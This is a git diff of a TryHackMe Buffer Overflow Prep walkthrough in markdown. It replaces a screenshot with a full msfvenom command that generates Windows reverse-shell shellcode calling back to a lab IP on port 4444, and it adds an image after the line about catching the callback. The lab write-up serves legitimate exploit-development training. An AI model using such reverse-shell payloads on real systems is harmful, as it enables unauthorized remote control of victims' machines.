--- a/TryHackMe/Buffer_Overflow_Prep/3.md
+++ b/TryHackMe/Buffer_Overflow_Prep/3.md
@@ -286,8 +286,7 @@ With this I find two valid jump points
 
 Using msfvenom and the badchars I found I can also now create my shellcode:
 
-![image](https://user-images.githubusercontent.com/83407557/185436736-9515e47c-5709-48a5-b666-da0879f94b37.png)
-
+`msfvenom -p windows/shell_reverse_tcp LHOST=10.6.77.38 LPORT=4444 EXITFUNC=thread -b "\x00\x11\x40\x5f\xb8\xee" -f c`
 
 # Creating exploit.py
 
@@ -355,4 +354,6 @@ except:
 ```
 
 Starting a listener on port 4444, I restart oscp.exe and run the above script to get a callback:
+
+![image](https://user-images.githubusercontent.com/83407557/185440697-866faf2b-496e-4352-9334-201d605bed96.png)
 
